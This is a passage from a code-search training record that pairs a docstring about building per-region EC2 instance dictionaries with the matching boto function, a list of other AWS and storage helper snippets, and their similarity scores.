generate_volume_info(self, NAME, path):\n info = {'tags': [], 'name': NAME, 'path': path, 'AttachedToVm': [],\n 'State': 'available', 'machine_path': None,\n 'time': datetime.datetime.now()}\n return info", "async def paginated_list(\n cls,\n status: str = 'ALIVE',\n *,\n fields: Sequence[FieldSpec] = _default_list_fields,\n page_offset: int = 0,\n page_size: int = 20,\n filter: str = None,\n order: str = None,\n ) -> PaginatedResult[dict]:\n return await generate_paginated_results(\n 'storage_volume_list',\n {\n 'filter': (filter, 'String'),\n 'order': (order, 'String'),\n },\n fields,\n page_offset=page_offset,\n page_size=page_size,\n )", "def vm_diskfilter(self):\r\n vm_diskfilter = []\r\n if self._vmDiskFilter is not None:\r\n subclient_diskfilter = self._vmDiskFilter\r\n\r\n if 'filters' in subclient_diskfilter:\r\n filters = subclient_diskfilter['filters']\r\n\r\n for child in filters:\r\n filter_type_id = str(child['filterType'])\r\n filter_type = self.filter_types[str(child['filterType'])]\r\n vm_id = child['vmGuid'] if 'vmGuid' in child else None\r\n filter_name = child['filter']\r\n\r\n temp_dict = {\r\n 'filter': filter_name,\r\n 'filterType': filter_type,\r\n 'vmGuid': vm_id,\r\n 'filterTypeId': filter_type_id\r\n }\r\n\r\n vm_diskfilter.append(temp_dict)\r\n else:\r\n vm_diskfilter = self._vmDiskFilter\r\n\r\n if len(vm_diskfilter) == 0:\r\n vm_diskfilter = None\r\n return vm_diskfilter", "def get_subvols(self, refresh=False):\n if not refresh and hasattr(self, \"subvols\"):\n return\n self.subvols = {}\n cmd = ['btrfs', 'subvol', 'list', '-p', self.path]\n out, err, ret = self.justcall(cmd)\n if ret != 0:\n raise InitError(\"error running btrfs subvol list %s:\\n\"%self.path+err)\n\n for line in 
out.split(\"\\n\"):\n if len(line) == 0:\n continue\n l = line.split()\n subvol = {}\n subvol['id'] = l[1]\n subvol['parent_id'] = l[3]\n subvol['top'] = l[6]\n subvol['path'] = line[line.index(\" path \")+6:]\n self.subvols[subvol['id']] = subvol", "def get_content(self):\r\n content = []\r\n for regiongroup in self.region_groups:\r\n for region in regiongroup.get_content():\r\n # Add date, unique_name and project to the metadata\r\n region[0]['date'] = self.extracted_date\r\n region[0]['unique_name'] = self.unique_name\r\n try:\r\n project = os.path.split(\r\n os.path.split(self.unique_name)[0]\r\n )[1]\r\n except IndexError:\r\n project = ''\r\n region[0]['project'] = project\r\n content.append(region)\r\n return content", "def ls(region_name=DEFAULT_REGION):\n s3conn = s3.connect_to_region(region_name)\n buckets = s3conn.get_all_buckets()\n for bucket in buckets:\n print(bucket.name)", "def get_variants_in_intervalset(db, intervalset):\n for mongo_match_region in intervalset.to_list_of_mongos():\n for variant in db.variants.find(mongo_match_region, projection={'_id': False}):\n yield variant", "def get_shells(velocity_file='../shell_candidates/AllShells_vrange_NtoS.txt',\n region_file='../shell_candidates/AllShells_NtoS.reg',\n ra_col=\"ra\", dec_col=\"dec\", radius_col=\"radius\", vmin_col='vmin', vmax_col='vmax',\n ra_unit='deg', dec_unit='deg', radius_unit='deg', v_unit='km/s'):\n shell_list = []\n try:\n region_list = pyregion.open(region_file)\n vel_table = ascii.read(velocity_file)\n vmin_list, vmax_list = vel_table[vmin_col], vel_table[vmax_col]\n except ValueError:\n raise\n\n for i, region in enumerate(region_list):\n ra, dec, radius = region.coord_list[0], region.coord_list[1], region.coord_list[2]\n shell_list += [Shell(ra, dec, radius, vmin_list[i], vmax_list[i])]\n\n\n return shell_list", "def RegionList(self):\n command = \"\"\"\n IPython.notebook.kernel.execute(\"RegionList=\" + JSON.stringify(JS9.GetShapes(\"regions\", {{display: '{wid}JS9'}})));\n \"\"\".format(wid=self.wid)\n get_ipython().run_cell_magic('javascript', '', command)", "def get_regionlist(chosenmodel):\n regionlist = list(chosenmodel.regions.keys())\n [ regionlist.remove(key) for key in regionlist\n if type(chosenmodel.regions[key]) is dict ]\n return regionlist" ]
[ "0.70386356", "0.68808", "0.6829185", "0.68042403", "0.6804185", "0.66357", "0.65796185", "0.6541075", "0.64998627", "0.6476049", "0.6467089", "0.6443325", "0.641429", "0.64000684", "0.62908834", "0.62458056", "0.61916316", "0.6191406", "0.611974", "0.6119484", "0.61047727", "0.6095844", "0.6070277", "0.60485876", "0.60419893", "0.6039224", "0.6025237", "0.59674895", "0.59635985", "0.5837586", "0.5828543", "0.5778964", "0.5778964", "0.5778964", "0.57782954", "0.5764721", "0.5711723", "0.5705303", "0.5687343", "0.56708914", "0.56621957", "0.5638317", "0.5635446", "0.5606726", "0.5565686", "0.555421", "0.5549527", "0.5541851", "0.5530126", "0.5503141", "0.5502502", "0.5493635", "0.54812187", "0.54779744", "0.5475513", "0.5470473", "0.54672587", "0.54560816", "0.54373354", "0.5425991", "0.542375", "0.5410085", "0.5406218", "0.5396337", "0.5392887", "0.53886634", "0.5385871", "0.5373164", "0.5373164", "0.5372205", "0.5370696", "0.53689784", "0.53604686", "0.5359323", "0.5349511", "0.533205", "0.5317229", "0.5316851", "0.53161603", "0.52946466", "0.5286341", "0.52836925", "0.5283136", "0.5274903", "0.5272932", "0.5269834", "0.52697915", "0.5267142", "0.52603227", "0.52579004", "0.525612", "0.5252837", "0.52517414", "0.5249301", "0.52175134", "0.5214611", "0.52061194", "0.520546", "0.5190724", "0.51883817" ]
0.77420294
0
return a list of dictionaries representing instances for one region, will help with volume → instance → KEEP-tag lookup. Maybe.
def getInstancesD(region):
    # Build one dictionary per instance in the region (used for volume → instance KEEP-tag lookups).
    instances = getInstances(region)
    instancesDicts = []
    for i in instances:
        instancesDict = {"id": i.id,
                         "KEEP-tag": getKeepTag(i),
                         "instance_type": i.instance_type,
                         "state": i.state,
                         "launch_time": i.launch_time,
                         "security_groups": getGroups(i),
                         "region": i.region.name,
                         "PROD": isProduction(i)
                         }
        instancesDicts.append(instancesDict)
    return instancesDicts
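# Minimal usage sketch (assumed names, for illustration only): given the helper
# functions referenced above exist, a volume → instance KEEP-tag lookup could be built as
#   instanceDicts = getInstancesD(region)
#   keepTagByInstanceId = {d["id"]: d["KEEP-tag"] for d in instanceDicts}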
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_instances(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_instances = []\n reservations = conn.get_all_reservations()\n for reservation in reservations:\n for instance in reservation.instances:\n region_instances.append(instance)\n except boto.exception.EC2ResponseError:\n return []\n return region_instances", "def _instancelist(self):\n\n rv = []\n self.iname = {}\n for resv in self.conn.get_all_reservations():\n for inst in resv.instances:\n if inst.state != 'terminated':\n name = inst.tags.get('Name',None)\n rv.append([inst.id,inst.state])\n if name is not None:\n rv.append([name,inst.state])\n else:\n rv.append([inst.id+'-needsName',inst.state])\n self.iname[name] = inst.id\n self.iname[inst.id] = inst.id\n return rv", "def listInstancesRegionZone(region,zone):\n\tprint \"-\"*80\n\tprint \"# Region :\",region,\" Zone\", zone\t\n\tprint \"-\"*80\n\tinstances = getInstancesRegionZone(region,zone)\n\tif instances:\n\t\tfor instance in instances:\n\t\t\tprint \"[\",instance.ami_launch_index,\"]\",instance.ip_address,\" (\",instance.private_ip_address,\") \",instance.instance_type,\" key=\",instance.key_name", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }", "def _get_instances(instance_tags, region):\n return ec2_conn[region].get_all_instances(filters={\"tag:Name\": instance_tags})", "def tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_))", "def get_instances(self):\n connection = self.connection\n\n instances = []\n\n connection.row_factory = sqlite3.Row\n cur = connection.cursor()\n cur.execute(\"SELECT * FROM INSTANCES\")\n rows = cur.fetchall()\n columns = [str(i[0]).lower() for i in cur.description]\n for row in rows:\n object = dict(zip(columns, row))\n instances.append(object)\n\n instancesNoneDict = {}\n\n for instance in instances:\n if instance['harvesterid'] not in instancesNoneDict:\n instancesNoneDict[instance['harvesterid']] = {}\n if instance['harvesterhost'] not in instancesNoneDict[instance['harvesterid']]:\n instancesNoneDict[instance['harvesterid']][instance['harvesterhost']] = {\n 'availability': instance['availability'], 'errorsdesc': instance['errorsdesc'],\n 'contacts': instance['contacts'].split(','),\n 'active': instance['active'], 'notificated': instance['notificated']}\n elif instance['harvesterid'] in instancesNoneDict:\n if instance['harvesterhost'] not in instancesNoneDict[instance['harvesterid']]:\n instancesNoneDict[instance['harvesterid']][instance['harvesterhost']] = {\n 'availability': instance['availability'], 'errorsdesc': instance['errorsdesc'],\n 'contacts': instance['contacts'].split(','),\n 'active': instance['active'], 'notificated': instance['notificated']}\n if 'none' in instancesNoneDict[instance['harvesterid']]:\n del instancesNoneDict[instance['harvesterid']]['none']\n return instancesNoneDict", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n 
\"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def get_instances() -> dict:\n url = f\"{app.config['COMPUTE_SERVERS_REF']}/detail\"\n instances_rq = request(\n method=\"GET\", url=url, headers=build_header(), params={\"vm_state\": \"active\"},\n )\n\n if not instances_rq.ok:\n HTTPError(instances_rq.status_code)\n\n answer = {\"servers\": list()}\n for instance in instances_rq.json()[\"servers\"]:\n instance_info = dict(name=instance[\"name\"])\n instance_info[\"ip_addresses\"] = list()\n for network, info in instance[\"addresses\"].items():\n instance_info[\"ip_addresses\"].extend(entry[\"addr\"] for entry in info)\n answer[\"servers\"].append(instance_info)\n\n return answer", "def _aws_get_instance_by_tag(region, name, tag, raw):\n client = boto3.session.Session().client('ec2', region)\n matching_reservations = client.describe_instances(Filters=[{'Name': tag, 'Values': [name]}]).get('Reservations', [])\n instances = []\n [[instances.append(_aws_instance_from_dict(region, instance, raw)) # pylint: disable=expression-not-assigned\n for instance in reservation.get('Instances')] for reservation in matching_reservations if reservation]\n return instances", "def instances(self):\r\n # It would be more efficient to do this with filters now\r\n # but not all services that implement EC2 API support filters.\r\n instances = []\r\n rs = self.connection.get_all_instances()\r\n for reservation in rs:\r\n uses_group = [g.name for g in reservation.groups if g.name == self.name]\r\n if uses_group:\r\n instances.extend(reservation.instances)\r\n return instances", "def get_ec2_instances(client):\n reservations = client.describe_instances().get(\"Reservations\")\n instances = list(map(lambda x: x.get(\"Instances\"), reservations))\n instances = list(itertools.chain.from_iterable(instances))\n return list(map(lambda x: {\n 'name': next((t['Value'] for t in x.get('Tags', []) if t.get('Key') == 'Name'), 'Unknown'),\n 'id': x.get('InstanceId'),\n 'state': x.get('State'),\n }, instances))", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? 
Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_instances(instance_ids):\n\n instances = dict()\n conn = connect_to_region(REGION, aws_access_key_id=KEY_ID, aws_secret_access_key=ACCESS_KEY)\n try:\n reservations = conn.get_all_instances(instance_ids)\n except EC2ResponseError, ex:\n print 'Got exception when calling EC2 for instances (%s): %s' % \\\n (\", \".join(instance_ids), ex.error_message)\n return instances\n\n for r in reservations:\n if len(r.instances) and r.instances[0].id in instance_ids:\n instances[r.instances[0].id] = r.instances[0].tags[\"Name\"]\n\n return instances", "def get_tags(self) -> Dict:\n return self.orthanc.get_instance_tags(self.identifier)", "def populate_instances(self):\n print \"Populating instances info...\"\n instances = self.get_all_instances()\n for i in instances:\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n PROD_tag=self.is_production(i), instance_type=i.instance_type,\n state=i.state, launched=i.launch_time, region=i.region.name)", "def getXeprInstances():\n apilib = _loadapilib()\n instances = _findInst(apilib)\n return dict([(p, t) for p, t in instances])", "def get_instance_templates(self):\n response = self.call_api('/global/instanceTemplates')\n return {\n template['name']: template for template in response.get('items', [])\n }", "def get_all_reservations(config):\n reservations = []\n region_list = regions(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for region in region_list:\n _logger.info(\"Searching %s\", region)\n cnx = region.connect(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for reservation in cnx.get_all_instances():\n _logger.info(\"Found %s %s\", reservation,\n [str(i.id) for i in reservation.instances])\n reservations.append(reservation)\n return reservations", "def aws_get_instances_by_id(region, instance_id, raw=True):\n client = boto3.session.Session().client('ec2', region)\n try:\n matching_reservations = client.describe_instances(InstanceIds=[instance_id]).get('Reservations', [])\n except ClientError as exc:\n if exc.response.get('Error', {}).get('Code') != 'InvalidInstanceID.NotFound':\n raise\n return []\n instances = []\n [[instances.append(_aws_instance_from_dict(region, instance, raw)) # pylint: disable=expression-not-assigned\n for instance in reservation.get('Instances')] for reservation in matching_reservations if reservation]\n return instances", "def ow_instances(ow, ow_stack):\n log.info(\"ow_instances( %s )\", ow_stack)\n try:\n instances = ow.describe_instances(StackId=ow_stack)\n except 
Exception, e:\n print(e)\n log.info(e)\n sys.exit()\n ow_launch_data = {}\n for instance in instances['Instances']:\n created_at = datetime.datetime.strptime(\n instance['CreatedAt'], '%Y-%m-%dT%H:%M:%S+00:00').strftime('%s')\n ow_launch_data[instance['InstanceId']] = created_at\n log.info(\"instance %s, created %s\", instance, created_at)\n return ow_launch_data", "def find_instances(\n instance_id=None,\n name=None,\n tags=None,\n region=None,\n key=None,\n keyid=None,\n profile=None,\n return_objs=False,\n in_states=None,\n filters=None,\n):\n conn = _get_conn(region=region, key=key, keyid=keyid, profile=profile)\n\n try:\n filter_parameters = {\"filters\": {}}\n\n if instance_id:\n filter_parameters[\"instance_ids\"] = [instance_id]\n\n if name:\n filter_parameters[\"filters\"][\"tag:Name\"] = name\n\n if tags:\n for tag_name, tag_value in tags.items():\n filter_parameters[\"filters\"][\"tag:{}\".format(tag_name)] = tag_value\n\n if filters:\n filter_parameters[\"filters\"].update(filters)\n\n reservations = conn.get_all_reservations(**filter_parameters)\n instances = [i for r in reservations for i in r.instances]\n log.debug(\n \"The filters criteria %s matched the following instances:%s\",\n filter_parameters,\n instances,\n )\n\n if in_states:\n instances = [i for i in instances if i.state in in_states]\n log.debug(\n \"Limiting instance matches to those in the requested states: %s\",\n instances,\n )\n if instances:\n if return_objs:\n return instances\n return [instance.id for instance in instances]\n else:\n return []\n except boto.exception.BotoServerError as exc:\n log.error(exc)\n return []", "def list_instances():\n print(str_sep)\n print(\"Listing EC2 instances from [{}] region.\".format(SESSION.region_name))\n print(\"{:20s}{:15s}{:10s}{}\".format(\"ID\", \"TYPE\", \"STATE\", \"NAME\"))\n print(str_sep)\n\n try:\n for instance in EC2_MANAGER.list_instances():\n # get the instance name in the tags list\n name = next((item for item in instance.tags if item[\"Key\"] == \"Name\"),\n {'Key': 'Name', 'Value': 'None'})\n\n print(\"{:20s}{:15s}{:10s}{}\".format(instance.id,\n instance.instance_type,\n instance.state['Name'],\n name['Value']))\n except ClientError as e:\n ErrManager.err_manager(e)\n\n print(str_sep)", "def simplified_tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_, params={'simplify': True}))", "def instances(self):\n return self.get('instances')", "def list_instances(self):\n\n response = self.client.service.instances().aggregatedList(\n project=self.client.project_id).execute()\n\n zones = response.get('items', {})\n instances = []\n for zone in zones.values():\n for instance in zone.get('instances', []):\n instances.append(instance)\n\n return instances", "def list_aws_instances(verbose=False, state='all'):\n conn = get_ec2_connection()\n\n reservations = conn.get_all_reservations()\n instances = []\n for res in reservations:\n for instance in res.instances:\n if state == 'all' or instance.state == state:\n instance = {\n 'id': instance.id,\n 'type': instance.instance_type,\n 'image': instance.image_id,\n 'state': instance.state,\n 'instance': instance,\n }\n instances.append(instance)\n env.instances = instances\n if verbose:\n import pprint\n pprint.pprint(env.instances)", "def ListInstances(self,\n resource_group_name: Optional[str] = None\n ) -> Dict[str, 'AZComputeVirtualMachine']:\n instances = {} # type: Dict[str, AZComputeVirtualMachine]\n az_vm_client = self.compute_client.virtual_machines\n if not resource_group_name:\n 
responses = common.ExecuteRequest(az_vm_client, 'list_all')\n else:\n responses = common.ExecuteRequest(\n az_vm_client,\n 'list',\n {'resource_group_name': resource_group_name})\n for response in responses:\n for instance in response:\n instances[instance.name] = AZComputeVirtualMachine(\n self.az_account,\n instance.id,\n instance.name,\n instance.location,\n zones=instance.zones)\n return instances", "def aws_get_instances_by_name(region, name, raw=True):\n return _aws_get_instance_by_tag(region, name, 'tag:Name', raw)", "def list_ec2(region, filter_by_kwargs):\n conn = boto.ec2.connect_to_region(region)\n instances = conn.get_only_instances()\n return lookup(instances, filter_by=filter_by_kwargs)", "def ListInstanceTypes(self,\n region: Optional[str] = None) -> List[Dict[str, Any]]:\n if not region:\n region = self.az_account.default_region\n available_vms = self.compute_client.virtual_machine_sizes.list(region)\n vm_sizes = []\n for vm in available_vms:\n vm_sizes.append({\n 'Name': vm.name,\n 'CPU': vm.number_of_cores,\n 'Memory': vm.memory_in_mb\n })\n return vm_sizes", "def getinstancelist():\n dbcursor_dict.execute(dbq.get_all_instance_list, )\n db_instance_list = dbcursor_dict.fetchall()\n return db_instance_list", "def get_instance_list(\n client,\n prefix: str\n):\n l = set()\n page = client.list_objects_v2(\n Bucket=bucket, Prefix=prefix, MaxKeys=page_size\n )\n l |= {r['Key'] for r in page['Contents'] if r['Key'][-4:] == 'json'}\n\n while page['IsTruncated']:\n page = client.list_objects_v2(\n Bucket=bucket,\n Prefix=prefix,\n MaxKeys=page_size,\n ContinuationToken=page['NextContinuationToken']\n )\n l |= {r['Key'] for r in page['Contents'] if r['Key'][-4:] == 'json'}\n return l", "def get_tags_for_instance(self, instance_id):\n try:\n response = self.ec2.describe_instances(InstanceIds=[instance_id])\n except Exception as e:\n logger.info(e)\n return []\n for reservation in response['Reservations']:\n for instance in reservation['Instances']:\n if instance['InstanceId'] == instance_id:\n return instance['Tags']\n return []", "def list_instances(self):\n instances = utils.list_instances(self.compute_client,\n drv_conf.resource_group)\n\n self._uuid_to_omni_instance.clear()\n instance_names = []\n for instance in instances:\n openstack_id = None\n if instance.tags and 'openstack_id' in instance.tags:\n openstack_id = instance.tags['openstack_id']\n if openstack_id is None:\n openstack_id = self._get_uuid_from_omni_id(instance.name)\n self._uuid_to_omni_instance[openstack_id] = instance\n instance_names.append(instance.name)\n return instance_names", "def get_instance_info(inst):\n instance_info = {'id': inst.id,\n 'private_ip': inst.inner_ip_address,\n 'public_ip': inst.public_ip_address,\n 'image_id': inst.image_id,\n 'zone_id': inst.zone_id,\n 'region_id': inst.region_id,\n 'launch_time': inst.creation_time,\n 'instance_type': inst.instance_type,\n 'state': inst.state,\n 'tags': inst.tags,\n # 'groups': dict((group.id, group.name) for group in inst.groups),\n # 'groups': dict((group, group) for group in inst.groups),\n 'vpc_id': inst.vpc_id,\n 'subnet_id': inst.subnet_id,\n 'vpc_private_ip': inst.vpc_private_ip,\n 'eip': inst.eip,\n 'io_optimized': inst.io_optimized\n }\n try:\n bdm_dict = {}\n bdm = getattr(inst, 'block_device_mapping')\n for device_name in bdm.keys():\n bdm_dict[device_name] = {\n 'status': bdm[device_name].status,\n 'volume_id': bdm[device_name].volume_id,\n 'delete_on_termination': bdm[device_name].delete_on_termination\n }\n 
instance_info['block_device_mapping'] = bdm_dict\n except AttributeError:\n instance_info['block_device_mapping'] = False\n\n return instance_info", "def __get_multi_instances(self, reservations, instance_ids=None, policies=None):\n check_instance_ids = False\n if ( instance_ids and len(instance_ids) > 0 ):\n check_instance_ids = True\n instances = [] \n for reservation in reservations:\n if check_instance_ids:\n for instance in reservation.instances:\n if instance.id in instance_ids:\n instances.append(instance)\n elif policies:\n for instance in reservation.instances:\n if 'typevm' in policies and instance.instance_type == policies['typevm']:\n instances.append(instance) \n elif policies.get('level')==1:\n if self.__compare_types_instances(policies, instance.instance_type.encode(\"latin-1\")):\n instances.append(instance)\n elif policies.get('level') == 0:\n if self.__is_adaptive_instance(self.__get_metrics_adapted(policies), instance.instance_type.encode(\"latin-1\")):\n instances.append(instance)\n else:\n instances=[]\n else:\n instances += reservation.instances\n return instances, len(instances)", "def get_all_vpc_instances ( ec2_conn, vpc ) :\n return ec2_conn.get_only_instances( filters = { \"vpc-id\" : vpc.id } )", "def regions_dict(self):\n regions_dict = dict()\n for i, r in enumerate(self.regions):\n regions_dict[getattr(r, 'ix', i)] = r\n return regions_dict", "def get_tags(instance_id=None, keyid=None, key=None, profile=None, region=None):\n tags = []\n client = _get_conn(key=key, keyid=keyid, profile=profile, region=region)\n result = client.get_all_tags(filters={\"resource-id\": instance_id})\n if result:\n for tag in result:\n tags.append({tag.name: tag.value})\n else:\n log.info(\"No tags found for instance_id %s\", instance_id)\n return tags", "def list_instances_by_tag(tag_key, tag_value):\n instances = EC2_MANAGER.list_instances_by_tag(tag_key, tag_value)\n\n print(str_sep)\n print(\"Listing EC2 instances from [{}] region with tag [{}:{}].\"\n .format(SESSION.region_name, tag_key, tag_value))\n print(\"{:20s}{:15s}{:10s}{}\".format(\"ID\", \"TYPE\", \"STATE\", \"NAME\"))\n print(str_sep)\n\n for reservations in instances['Reservations']:\n for instance in reservations['Instances']:\n name = next((item for item in instance['Tags'] if item[\"Key\"] == \"Name\"),\n {'Key': 'Name', 'Value': 'None'})\n\n print(\"{:20s}{:15s}{:10s}{}\".format(instance['InstanceId'],\n instance['InstanceType'],\n instance['State']['Name'],\n name['Value']))\n\n print(str_sep)", "def populate_volumes(self):\n print \"Populating volumes info...\"\n volumes = self.get_all_volumes()\n for i in volumes:\n\n # handle associated instance's KEEP-tag\n associated_instance_id = i.attach_data.instance_id\n\n if associated_instance_id is None: # sometimes there is no attached instance\n instance_keep_tag = \"-------no-instance-found\"\n else:\n instance_keep_tag = Ins.spreadsheet[associated_instance_id]['KEEP_tag']\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n instance_KEEP_tag=instance_keep_tag,\n associated_instance_id=associated_instance_id,\n PROD_tag=self.is_production(i), attachment_state=i.attachment_state(),\n state=i.volume_state(), status=i.status, iops=i.iops, size=i.size,\n created=i.create_time, region=i.region.name)", "def run(self):\n ilist = []\n key_filter = filters[self.args['filter_group']]\n for item in self.client.describe_instances()['Reservations']:\n for instance in item['Instances']:\n idict = {}\n for tag in 
instance['Tags']:\n if not any(t['Key'] == 'Name' for t in instance['Tags']):\n tag['Value'] = 'Unnamed'\n idict['Name'] = tag['Value']\n if tag['Key'] == 'Name':\n if tag['Value'] == \"\":\n tag['Value'] = 'Unnamed'\n idict['Name'] = tag['Value']\n for key in key_filter:\n try:\n if key in ['AvailabilityZone','Tenancy']:\n idict[key] = instance['Placement'][key]\n elif key == 'SecurityGroups':\n sg_list = []\n for sg in instance[key]:\n sg_list.append(sg['GroupId'])\n if self.args['output'] == 'csv':\n sg_string = \" \\n\"\n idict[key] = sg_string.join(sg_list)\n else:\n idict[key] = ','.join(sg_list)\n elif key == 'BlockDeviceMappings':\n devices = []\n for dev in instance[key]:\n devices.append(dev['DeviceName'])\n if self.args['output'] == 'csv':\n dev_string = \" \\n\"\n idict[key] = dev_string.join(devices)\n else:\n idict[key] = ','.join(devices)\n elif key == 'State':\n idict[key] = instance[key]['Name']\n else:\n if instance[key]:\n idict[key] = instance[key]\n except Exception as e:\n idict[key] = 'N/A'\n ilist.append(idict)\n self.template(self.sortList(ilist))", "def get_volumes(instance):\n if instance.cloud == 'aws':\n client = boto3.session.Session().client('ec2', instance.region)\n devices = client.describe_instance_attribute(\n InstanceId=instance.id, Attribute='blockDeviceMapping').get('BlockDeviceMappings', [])\n volumes = client.describe_volumes(VolumeIds=[device['Ebs']['VolumeId']\n for device in devices if device.get('Ebs', {}).get('VolumeId')]).get('Volumes', [])\n return {volume['Attachments'][0]['Device']: {'size': volume['Size'], 'volume_type': volume['VolumeType']} for volume in volumes}\n if instance.cloud == 'gcp':\n credentials = GoogleCredentials.get_application_default()\n compute = discovery.build('compute', 'v1', credentials=credentials)\n volumes = {}\n for disk in compute.instances().get(instance=instance.id,\n zone=instance.zone,\n project=instance.project).execute()['disks']:\n index = disk['index']\n name = disk['deviceName'] if disk['deviceName'] not in [u'persistent-disk-0', 'boot'] else instance.id\n if 'local-ssd' in disk['deviceName']:\n size = 375.0\n disk_type = 'local-ssd'\n else:\n size = float(disk.get('diskSizeGb', 0.))\n disk_type = 'pd-ssd'\n volumes[index] = {'size': size,\n 'type': disk['type'],\n 'deviceName': disk['deviceName'],\n 'interface': disk['interface'],\n 'diskType': disk_type}\n return volumes\n raise ValueError('Unknown cloud %s' % instance.cloud)", "def list_rds(region, filter_by_kwargs):\n conn = boto.rds.connect_to_region(region)\n instances = conn.get_all_dbinstances()\n return lookup(instances, filter_by=filter_by_kwargs)", "def get_instances(instance_ids: np.ndarray, class_ids: np.ndarray,\n class_labels: List[str], id2label: Dict) -> Dict:\n assert len(class_labels) == len(class_ids)\n instances = {}\n for label in class_labels:\n instances[label] = []\n # traverse all instances\n inst_ids = np.unique(instance_ids)\n for id in inst_ids:\n # skip 0 and negative instance id (background points)\n if id <= 0:\n continue\n # get instance\n inst = VertInstance(instance_ids, id)\n # record in correspond class dict\n if inst.label_id in class_ids:\n instances[id2label[inst.label_id]].append(inst.dict)\n return instances", "def get_instances(cls):\n raise NotImplementedError", "def get_instances_by_tags(self, tags):\n return self.get_only_instances(filters={'tag:{}'.format(key): val for key, val in tags.items()})", "def Get_Running_Instances():\n ec2 = boto3.resource('ec2') \n #call the features resource from the boto3 
library\n instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['pending', 'running',]},])\n #filter the instances returned using the state name\n #you can also filter using Tags by adding the filters: \n #[{'Name': 'tag-key', 'Values': ['Role','Name',]}, {'Name': 'tag-value', 'Values': ['*test*', '*TEST*',]},]\n return [instance.id for instance in instances]\n #return a liste with the ids of the instances", "def list_as_instances(access_key, secret_key, region, autoscaling_group):\n\n aws_as = init_aws_as_conn(access_key, secret_key, region)\n aws_ec2 = init_aws_ec2_conn(access_key, secret_key, region)\n autoscaling_instances = []\n\n vm = aws_as.get_all_groups([autoscaling_group])\n autoscaling_instances_id = [j.instance_id for i in vm for j in i.instances]\n\n for instance_id in autoscaling_instances_id:\n vm = boto.ec2.instance.Instance(aws_ec2)\n vm.id = instance_id\n vm.update()\n autoscaling_instances.append(vm)\n\n return autoscaling_instances", "def list_instances_detail(self):\n\n # TODO(imsplitbit): need to ask around if this is the best way to do\n # this. This causes some redundant vzlist commands as get_info is run\n # on every item returned from this command but it didn't make sense\n # to re-implement get_info as get_info_all.\n infos = []\n try:\n # get a list of CT names which will be nova friendly.\n # NOTE: This can be an issue if nova decides to change\n # the format of names. We would need to have a migration process\n # to change the names in the name field of the CTs.\n out, err = utils.execute('sudo', 'vzlist', '--all', '-o',\n 'name', '-H')\n if err:\n LOG.error(err)\n except ProcessExecutionError as err:\n LOG.error(err)\n raise exception.Error('Problem listing Vzs')\n\n for name in out.splitlines():\n name = name.split()[0]\n status = self.get_info(name)\n infos.append(driver.InstanceInfo(name, status['state']))\n\n return infos", "def list_instances(self):\n print '# AWS EC2 instances'\n self.compute.list_instances()", "def get_instances(self):\n for server in self.cs.servers.list():\n match = self.cluster_re.match(server.name)\n if match:\n for ip in server.networks['public']:\n if ip.count('.'):\n v4ip = ip\n yield (match.group('role'), v4ip)", "def create_observations_dict(instances, unprocessed_map_data):\n # print(instances)\n results = {}\n for idx in instances:\n results[idx] = {}\n if idx == instances[0]:\n tag_filter_pixel_corners = B.compute_corner_pixels(\n idx, unprocessed_map_data\n ).tolist()\n # prettified_corner_pixels = [tag_filter_pixel_corners[:2,0],tag_filter_pixel_corners[:2,1],tag_filter_pixel_corners[:2,2],tag_filter_pixel_corners[:2,3]]\n # results[idx][\"corner_pixels\"] = [pixel_pair.tolist() for pixel_pair in prettified_corner_pixels]\n results[idx][\"corner_pixels\"] = tag_filter_pixel_corners\n results[idx][\"tag_pose\"] = B.compute_tag_pose(\n idx, unprocessed_map_data\n ).tolist()\n results[idx][\"camera_pose\"] = B.compute_camera_pose(\n idx, unprocessed_map_data\n ).tolist()\n\n return results", "def list_instances(self):\n nodes = self._driver.list_nodes()\n return 